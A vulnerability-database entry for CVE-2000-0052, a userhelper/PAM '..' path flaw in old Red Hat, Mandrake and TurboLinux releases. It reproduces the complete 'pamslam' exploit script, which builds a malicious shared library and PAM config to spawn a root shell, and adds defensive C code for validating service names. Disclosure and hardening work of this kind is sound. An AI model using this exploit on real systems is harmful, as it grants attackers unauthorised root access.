Multiple Linux Vendors userhelper/PAM Path Vulnerability

Vulnerability ID 1105676 Vulnerability type Input validation
Published 2000-01-04 Updated 2005-05-02
CVE ID CVE-2000-0052
CNNVD-ID CNNVD-200001-018
Platform Linux CVSS score 7.2
|Sources
https://www.exploit-db.com/exploits/19709
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-018
|Vulnerability details
The userhelper program in the Red Hat usermode package contains a vulnerability. A local user can gain root access by way of PAM and a ".." (dot-dot) attack.
|Exploit
Mandrake 6.0/6.1, RedHat 6.0/6.1, Turbolinux 3.5 b2/4.2/4.4/6.0.2 userhelper/PAM Path Vulnerability (1)

source: http://www.securityfocus.com/bid/913/info

Because of double path vulnerabilities in the binary userhelper and PAM, it is possible to get root locally on RedHat 6.0 and 6.1 systems. Both userhelper and PAM follow ".." paths, and userhelper allows you to specify a program to execute as an argument to the -w parameter (which is expected to have an entry in /etc/security/console.apps). Because of this, it's possible to specify a program such as "../../../tmp/myprog", which would (to userhelper) be "/etc/security/console.apps/../../../tmp/myprog". If "myprog" exists, PAM will then try to execute it (with the same filename). PAM first does a check to see if the configuration file for "../../../tmp/myprog" is in /etc/pam.d/, but it also follows ".." directories -- to an attacker's custom PAM configuration file. Specified inside the malicious configuration file (/tmp/myprog) would be arbitrary shared libraries to be opened with setuid privileges. The arbitrary libraries can be created by an attacker specifically to compromise superuser access, activating upon dlopen() by PAM.

This vulnerability also affects Mandrake Linux versions 6.0 and 6.1, as well as versions of TurboLinux Linux, version 6.0.2 and prior.


#!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by [email protected]
#  
# synopsis:
#    both 'pam' and 'userhelper' (a setuid binary that comes with the
#    'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#    _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
#    being setuid means we can get root. 
#
# fix: 
#    No fuckin idea for a good fix. Get rid of the .. paths in userhelper 
#    for a quick fix. Remember 'strcat' isn't a very good way of confining
#    a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.

cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
    setuid(geteuid());
    system("/bin/sh");
}
EOF

echo -n .

echo -e auth\trequired\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf

echo -n .

gcc -fPIC -o _pamslam.o -c _pamslam.c

echo -n o

ld -shared -o _pamslam.so _pamslam.o

echo -n o

chmod 755 _pamslam.so

echo -n O

rm _pamslam.c
rm _pamslam.o

echo O

/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf

sleep 1s

rm _pamslam.so
rm _pamslam.conf
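The root cause described in the advisory above, and in the script's "fix" comment about strcat, is that a caller-supplied service name is appended to a fixed directory without being confined to it. The following is an added example, not userhelper's or Linux-PAM's own code: a naive strcat-style join of the kind the advisory describes, beside a hardened variant that only accepts a single path component as the service name. The base directory and function names are assumptions chosen for illustration.

```c
/* Added example, not code from userhelper or Linux-PAM. */
#include <stdio.h>
#include <string.h>

/* Naive join: base + "/" + name, the pattern the advisory warns about.
 * Any ".." component in name walks back out of base. Returns 0, or -1
 * if the result does not fit in out. */
int naive_join(const char *base, const char *name, char *out, size_t outlen)
{
    if (strlen(base) + 1 + strlen(name) + 1 > outlen)
        return -1;
    strcpy(out, base);
    strcat(out, "/");
    strcat(out, name);
    return 0;
}

/* A service name must be exactly one path component: non-empty, no '/',
 * not "." or "..", and drawn from a conservative character set.
 * Returns 1 if the name is acceptable, 0 otherwise. */
int service_name_ok(const char *name)
{
    if (name == NULL || *name == '\0')
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    for (const char *p = name; *p; p++) {
        int c = (unsigned char)*p;
        if (!(c >= 'a' && c <= 'z') && !(c >= 'A' && c <= 'Z') &&
            !(c >= '0' && c <= '9') && c != '_' && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

/* Hardened join: validates the name before building the path, so the
 * result is always a direct child of base. Returns 0 on success, -1 if
 * the name is rejected or the result does not fit. */
int safe_join(const char *base, const char *name, char *out, size_t outlen)
{
    if (!service_name_ok(name))
        return -1;
    int n = snprintf(out, outlen, "%s/%s", base, name);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return 0;
}
```

The same check applies on the PAM side, where the service name selects a file under /etc/pam.d: rejecting names with a '/' in them closes both halves of the "double path" problem at once.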
|References

Source: XF
Name: linux-pam-userhelper
Link: http://xforce.iss.net/search.php3?type=2&pattern=linux-pam-userhelper
Source: BID
Name: 913
Link: http://www.securityfocus.com/bid/913
Source: REDHAT
Name: RHSA-2000:001
Link: http://www.redhat.com/support/errata/RHSA-2000-001.html
Source: L0PHT
Name: 20000104PamSlam
Link: http://www.l0pht.com/advisories/pam_advisory
